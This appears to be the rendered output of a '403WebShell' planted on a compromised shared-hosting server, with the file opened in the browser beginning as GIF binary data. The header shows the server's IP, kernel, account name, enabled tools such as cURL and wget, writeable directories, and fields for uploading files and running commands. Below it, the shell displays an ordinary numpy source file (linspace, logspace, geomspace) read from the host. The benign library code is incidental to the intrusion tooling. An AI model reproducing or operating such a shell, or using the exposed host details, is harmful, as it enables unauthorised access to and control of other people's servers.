GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 172.67.177.218  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/core/function_base.py
import functools
import warnings
import operator
import types

import numpy as np
from . import numeric as _nx
from .numeric import result_type, NaN, asanyarray, ndim
from numpy.core.multiarray import add_docstring
from numpy.core import overrides

__all__ = ['logspace', 'linspace', 'geomspace']


array_function_dispatch = functools.partial(
    overrides.array_function_dispatch, module='numpy')


def _linspace_dispatcher(start, stop, num=None, endpoint=None, retstep=None,
                         dtype=None, axis=None):
    return (start, stop)


@array_function_dispatch(_linspace_dispatcher)
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None,
             axis=0):
    """
    Return evenly spaced numbers over a specified interval.

    Returns `num` evenly spaced samples, calculated over the
    interval [`start`, `stop`].

    The endpoint of the interval can optionally be excluded.

    .. versionchanged:: 1.16.0
        Non-scalar `start` and `stop` are now supported.

    .. versionchanged:: 1.20.0
        Values are rounded towards ``-inf`` instead of ``0`` when an
        integer ``dtype`` is specified. The old behavior can
        still be obtained with ``np.linspace(start, stop, num).astype(int)``

    Parameters
    ----------
    start : array_like
        The starting value of the sequence.
    stop : array_like
        The end value of the sequence, unless `endpoint` is set to False.
        In that case, the sequence consists of all but the last of ``num + 1``
        evenly spaced samples, so that `stop` is excluded.  Note that the step
        size changes when `endpoint` is False.
    num : int, optional
        Number of samples to generate. Default is 50. Must be non-negative.
    endpoint : bool, optional
        If True, `stop` is the last sample. Otherwise, it is not included.
        Default is True.
    retstep : bool, optional
        If True, return (`samples`, `step`), where `step` is the spacing
        between samples.
    dtype : dtype, optional
        The type of the output array.  If `dtype` is not given, the data type
        is inferred from `start` and `stop`. The inferred dtype will never be
        an integer; `float` is chosen even if the arguments would produce an
        array of integers.

        .. versionadded:: 1.9.0

    axis : int, optional
        The axis in the result to store the samples.  Relevant only if start
        or stop are array-like.  By default (0), the samples will be along a
        new axis inserted at the beginning. Use -1 to get an axis at the end.

        .. versionadded:: 1.16.0

    Returns
    -------
    samples : ndarray
        There are `num` equally spaced samples in the closed interval
        ``[start, stop]`` or the half-open interval ``[start, stop)``
        (depending on whether `endpoint` is True or False).
    step : float, optional
        Only returned if `retstep` is True

        Size of spacing between samples.


    See Also
    --------
    arange : Similar to `linspace`, but uses a step size (instead of the
             number of samples).
    geomspace : Similar to `linspace`, but with numbers spaced evenly on a log
                scale (a geometric progression).
    logspace : Similar to `geomspace`, but with the end points specified as
               logarithms.
    :ref:`how-to-partition`

    Examples
    --------
    >>> np.linspace(2.0, 3.0, num=5)
    array([2.  , 2.25, 2.5 , 2.75, 3.  ])
    >>> np.linspace(2.0, 3.0, num=5, endpoint=False)
    array([2. ,  2.2,  2.4,  2.6,  2.8])
    >>> np.linspace(2.0, 3.0, num=5, retstep=True)
    (array([2.  ,  2.25,  2.5 ,  2.75,  3.  ]), 0.25)

    Graphical illustration:

    >>> import matplotlib.pyplot as plt
    >>> N = 8
    >>> y = np.zeros(N)
    >>> x1 = np.linspace(0, 10, N, endpoint=True)
    >>> x2 = np.linspace(0, 10, N, endpoint=False)
    >>> plt.plot(x1, y, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.plot(x2, y + 0.5, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.ylim([-0.5, 1])
    (-0.5, 1)
    >>> plt.show()

    """
    num = operator.index(num)
    if num < 0:
        raise ValueError("Number of samples, %s, must be non-negative." % num)
    div = (num - 1) if endpoint else num

    # Convert float/complex array scalars to float, gh-3504
    # and make sure one can use variables that have an __array_interface__, gh-6634
    start = asanyarray(start) * 1.0
    stop  = asanyarray(stop)  * 1.0

    dt = result_type(start, stop, float(num))
    if dtype is None:
        dtype = dt
        integer_dtype = False
    else:
        integer_dtype = _nx.issubdtype(dtype, _nx.integer)

    delta = stop - start
    y = _nx.arange(0, num, dtype=dt).reshape((-1,) + (1,) * ndim(delta))
    # In-place multiplication y *= delta/div is faster, but prevents the multiplicant
    # from overriding what class is produced, and thus prevents, e.g. use of Quantities,
    # see gh-7142. Hence, we multiply in place only for standard scalar types.
    if div > 0:
        _mult_inplace = _nx.isscalar(delta)
        step = delta / div
        any_step_zero = (
            step == 0 if _mult_inplace else _nx.asanyarray(step == 0).any())
        if any_step_zero:
            # Special handling for denormal numbers, gh-5437
            y /= div
            if _mult_inplace:
                y *= delta
            else:
                y = y * delta
        else:
            if _mult_inplace:
                y *= step
            else:
                y = y * step
    else:
        # sequences with 0 items or 1 item with endpoint=True (i.e. div <= 0)
        # have an undefined step
        step = NaN
        # Multiply with delta to allow possible override of output class.
        y = y * delta

    y += start

    if endpoint and num > 1:
        y[-1, ...] = stop

    if axis != 0:
        y = _nx.moveaxis(y, 0, axis)

    if integer_dtype:
        _nx.floor(y, out=y)

    if retstep:
        return y.astype(dtype, copy=False), step
    else:
        return y.astype(dtype, copy=False)


def _logspace_dispatcher(start, stop, num=None, endpoint=None, base=None,
                         dtype=None, axis=None):
    return (start, stop, base)


@array_function_dispatch(_logspace_dispatcher)
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None,
             axis=0):
    """
    Return numbers spaced evenly on a log scale.

    In linear space, the sequence starts at ``base ** start``
    (`base` to the power of `start`) and ends with ``base ** stop``
    (see `endpoint` below).

    .. versionchanged:: 1.16.0
        Non-scalar `start` and `stop` are now supported.

    .. versionchanged:: 1.25.0
        Non-scalar 'base` is now supported

    Parameters
    ----------
    start : array_like
        ``base ** start`` is the starting value of the sequence.
    stop : array_like
        ``base ** stop`` is the final value of the sequence, unless `endpoint`
        is False.  In that case, ``num + 1`` values are spaced over the
        interval in log-space, of which all but the last (a sequence of
        length `num`) are returned.
    num : integer, optional
        Number of samples to generate.  Default is 50.
    endpoint : boolean, optional
        If true, `stop` is the last sample. Otherwise, it is not included.
        Default is True.
    base : array_like, optional
        The base of the log space. The step size between the elements in
        ``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform.
        Default is 10.0.
    dtype : dtype
        The type of the output array.  If `dtype` is not given, the data type
        is inferred from `start` and `stop`. The inferred type will never be
        an integer; `float` is chosen even if the arguments would produce an
        array of integers.
    axis : int, optional
        The axis in the result to store the samples.  Relevant only if start,
        stop, or base are array-like.  By default (0), the samples will be
        along a new axis inserted at the beginning. Use -1 to get an axis at
        the end.

        .. versionadded:: 1.16.0


    Returns
    -------
    samples : ndarray
        `num` samples, equally spaced on a log scale.

    See Also
    --------
    arange : Similar to linspace, with the step size specified instead of the
             number of samples. Note that, when used with a float endpoint, the
             endpoint may or may not be included.
    linspace : Similar to logspace, but with the samples uniformly distributed
               in linear space, instead of log space.
    geomspace : Similar to logspace, but with endpoints specified directly.
    :ref:`how-to-partition`

    Notes
    -----
    If base is a scalar, logspace is equivalent to the code

    >>> y = np.linspace(start, stop, num=num, endpoint=endpoint)
    ... # doctest: +SKIP
    >>> power(base, y).astype(dtype)
    ... # doctest: +SKIP

    Examples
    --------
    >>> np.logspace(2.0, 3.0, num=4)
    array([ 100.        ,  215.443469  ,  464.15888336, 1000.        ])
    >>> np.logspace(2.0, 3.0, num=4, endpoint=False)
    array([100.        ,  177.827941  ,  316.22776602,  562.34132519])
    >>> np.logspace(2.0, 3.0, num=4, base=2.0)
    array([4.        ,  5.0396842 ,  6.34960421,  8.        ])
    >>> np.logspace(2.0, 3.0, num=4, base=[2.0, 3.0], axis=-1)
    array([[ 4.        ,  5.0396842 ,  6.34960421,  8.        ],
           [ 9.        , 12.98024613, 18.72075441, 27.        ]])

    Graphical illustration:

    >>> import matplotlib.pyplot as plt
    >>> N = 10
    >>> x1 = np.logspace(0.1, 1, N, endpoint=True)
    >>> x2 = np.logspace(0.1, 1, N, endpoint=False)
    >>> y = np.zeros(N)
    >>> plt.plot(x1, y, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.plot(x2, y + 0.5, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.ylim([-0.5, 1])
    (-0.5, 1)
    >>> plt.show()

    """
    ndmax = np.broadcast(start, stop, base).ndim
    start, stop, base = (
        np.array(a, copy=False, subok=True, ndmin=ndmax)
        for a in (start, stop, base)
    )
    y = linspace(start, stop, num=num, endpoint=endpoint, axis=axis)
    base = np.expand_dims(base, axis=axis)
    if dtype is None:
        return _nx.power(base, y)
    return _nx.power(base, y).astype(dtype, copy=False)


def _geomspace_dispatcher(start, stop, num=None, endpoint=None, dtype=None,
                          axis=None):
    return (start, stop)


@array_function_dispatch(_geomspace_dispatcher)
def geomspace(start, stop, num=50, endpoint=True, dtype=None, axis=0):
    """
    Return numbers spaced evenly on a log scale (a geometric progression).

    This is similar to `logspace`, but with endpoints specified directly.
    Each output sample is a constant multiple of the previous.

    .. versionchanged:: 1.16.0
        Non-scalar `start` and `stop` are now supported.

    Parameters
    ----------
    start : array_like
        The starting value of the sequence.
    stop : array_like
        The final value of the sequence, unless `endpoint` is False.
        In that case, ``num + 1`` values are spaced over the
        interval in log-space, of which all but the last (a sequence of
        length `num`) are returned.
    num : integer, optional
        Number of samples to generate.  Default is 50.
    endpoint : boolean, optional
        If true, `stop` is the last sample. Otherwise, it is not included.
        Default is True.
    dtype : dtype
        The type of the output array.  If `dtype` is not given, the data type
        is inferred from `start` and `stop`. The inferred dtype will never be
        an integer; `float` is chosen even if the arguments would produce an
        array of integers.
    axis : int, optional
        The axis in the result to store the samples.  Relevant only if start
        or stop are array-like.  By default (0), the samples will be along a
        new axis inserted at the beginning. Use -1 to get an axis at the end.

        .. versionadded:: 1.16.0

    Returns
    -------
    samples : ndarray
        `num` samples, equally spaced on a log scale.

    See Also
    --------
    logspace : Similar to geomspace, but with endpoints specified using log
               and base.
    linspace : Similar to geomspace, but with arithmetic instead of geometric
               progression.
    arange : Similar to linspace, with the step size specified instead of the
             number of samples.
    :ref:`how-to-partition`

    Notes
    -----
    If the inputs or dtype are complex, the output will follow a logarithmic
    spiral in the complex plane.  (There are an infinite number of spirals
    passing through two points; the output will follow the shortest such path.)

    Examples
    --------
    >>> np.geomspace(1, 1000, num=4)
    array([    1.,    10.,   100.,  1000.])
    >>> np.geomspace(1, 1000, num=3, endpoint=False)
    array([   1.,   10.,  100.])
    >>> np.geomspace(1, 1000, num=4, endpoint=False)
    array([   1.        ,    5.62341325,   31.6227766 ,  177.827941  ])
    >>> np.geomspace(1, 256, num=9)
    array([   1.,    2.,    4.,    8.,   16.,   32.,   64.,  128.,  256.])

    Note that the above may not produce exact integers:

    >>> np.geomspace(1, 256, num=9, dtype=int)
    array([  1,   2,   4,   7,  16,  32,  63, 127, 256])
    >>> np.around(np.geomspace(1, 256, num=9)).astype(int)
    array([  1,   2,   4,   8,  16,  32,  64, 128, 256])

    Negative, decreasing, and complex inputs are allowed:

    >>> np.geomspace(1000, 1, num=4)
    array([1000.,  100.,   10.,    1.])
    >>> np.geomspace(-1000, -1, num=4)
    array([-1000.,  -100.,   -10.,    -1.])
    >>> np.geomspace(1j, 1000j, num=4)  # Straight line
    array([0.   +1.j, 0.  +10.j, 0. +100.j, 0.+1000.j])
    >>> np.geomspace(-1+0j, 1+0j, num=5)  # Circle
    array([-1.00000000e+00+1.22464680e-16j, -7.07106781e-01+7.07106781e-01j,
            6.12323400e-17+1.00000000e+00j,  7.07106781e-01+7.07106781e-01j,
            1.00000000e+00+0.00000000e+00j])

    Graphical illustration of `endpoint` parameter:

    >>> import matplotlib.pyplot as plt
    >>> N = 10
    >>> y = np.zeros(N)
    >>> plt.semilogx(np.geomspace(1, 1000, N, endpoint=True), y + 1, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.semilogx(np.geomspace(1, 1000, N, endpoint=False), y + 2, 'o')
    [<matplotlib.lines.Line2D object at 0x...>]
    >>> plt.axis([0.5, 2000, 0, 3])
    [0.5, 2000, 0, 3]
    >>> plt.grid(True, color='0.7', linestyle='-', which='both', axis='both')
    >>> plt.show()

    """
    start = asanyarray(start)
    stop = asanyarray(stop)
    if _nx.any(start == 0) or _nx.any(stop == 0):
        raise ValueError('Geometric sequence cannot include zero')

    dt = result_type(start, stop, float(num), _nx.zeros((), dtype))
    if dtype is None:
        dtype = dt
    else:
        # complex to dtype('complex128'), for instance
        dtype = _nx.dtype(dtype)

    # Promote both arguments to the same dtype in case, for instance, one is
    # complex and another is negative and log would produce NaN otherwise.
    # Copy since we may change things in-place further down.
    start = start.astype(dt, copy=True)
    stop = stop.astype(dt, copy=True)

    out_sign = _nx.ones(_nx.broadcast(start, stop).shape, dt)
    # Avoid negligible real or imaginary parts in output by rotating to
    # positive real, calculating, then undoing rotation
    if _nx.issubdtype(dt, _nx.complexfloating):
        all_imag = (start.real == 0.) & (stop.real == 0.)
        if _nx.any(all_imag):
            start[all_imag] = start[all_imag].imag
            stop[all_imag] = stop[all_imag].imag
            out_sign[all_imag] = 1j

    both_negative = (_nx.sign(start) == -1) & (_nx.sign(stop) == -1)
    if _nx.any(both_negative):
        _nx.negative(start, out=start, where=both_negative)
        _nx.negative(stop, out=stop, where=both_negative)
        _nx.negative(out_sign, out=out_sign, where=both_negative)

    log_start = _nx.log10(start)
    log_stop = _nx.log10(stop)
    result = logspace(log_start, log_stop, num=num,
                      endpoint=endpoint, base=10.0, dtype=dtype)

    # Make sure the endpoints match the start and stop arguments. This is
    # necessary because np.exp(np.log(x)) is not necessarily equal to x.
    if num > 0:
        result[0] = start
        if num > 1 and endpoint:
            result[-1] = stop

    result = out_sign * result

    if axis != 0:
        result = _nx.moveaxis(result, 0, axis)

    return result.astype(dtype, copy=False)


def _needs_add_docstring(obj):
    """
    Returns true if the only way to set the docstring of `obj` from python is
    via add_docstring.

    This function errs on the side of being overly conservative.
    """
    Py_TPFLAGS_HEAPTYPE = 1 << 9

    if isinstance(obj, (types.FunctionType, types.MethodType, property)):
        return False

    if isinstance(obj, type) and obj.__flags__ & Py_TPFLAGS_HEAPTYPE:
        return False

    return True


def _add_docstring(obj, doc, warn_on_python):
    if warn_on_python and not _needs_add_docstring(obj):
        warnings.warn(
            "add_newdoc was used on a pure-python object {}. "
            "Prefer to attach it directly to the source."
            .format(obj),
            UserWarning,
            stacklevel=3)
    try:
        add_docstring(obj, doc)
    except Exception:
        pass


def add_newdoc(place, obj, doc, warn_on_python=True):
    """
    Add documentation to an existing object, typically one defined in C

    The purpose is to allow easier editing of the docstrings without requiring
    a re-compile. This exists primarily for internal use within numpy itself.

    Parameters
    ----------
    place : str
        The absolute name of the module to import from
    obj : str
        The name of the object to add documentation to, typically a class or
        function name
    doc : {str, Tuple[str, str], List[Tuple[str, str]]}
        If a string, the documentation to apply to `obj`

        If a tuple, then the first element is interpreted as an attribute of
        `obj` and the second as the docstring to apply - ``(method, docstring)``

        If a list, then each element of the list should be a tuple of length
        two - ``[(method1, docstring1), (method2, docstring2), ...]``
    warn_on_python : bool
        If True, the default, emit `UserWarning` if this is used to attach
        documentation to a pure-python object.

    Notes
    -----
    This routine never raises an error if the docstring can't be written, but
    will raise an error if the object being documented does not exist.

    This routine cannot modify read-only docstrings, as appear
    in new-style classes or built-in functions. Because this
    routine never raises an error the caller must check manually
    that the docstrings were changed.

    Since this function grabs the ``char *`` from a c-level str object and puts
    it into the ``tp_doc`` slot of the type of `obj`, it violates a number of
    C-API best-practices, by:

    - modifying a `PyTypeObject` after calling `PyType_Ready`
    - calling `Py_INCREF` on the str and losing the reference, so the str
      will never be released

    If possible it should be avoided.
    """
    new = getattr(__import__(place, globals(), {}, [obj]), obj)
    if isinstance(doc, str):
        _add_docstring(new, doc.strip(), warn_on_python)
    elif isinstance(doc, tuple):
        attr, docstring = doc
        _add_docstring(getattr(new, attr), docstring.strip(), warn_on_python)
    elif isinstance(doc, list):
        for attr, docstring in doc:
            _add_docstring(getattr(new, attr), docstring.strip(), warn_on_python)

Youez - 2016 - github.com/yon3zu
LinuXploit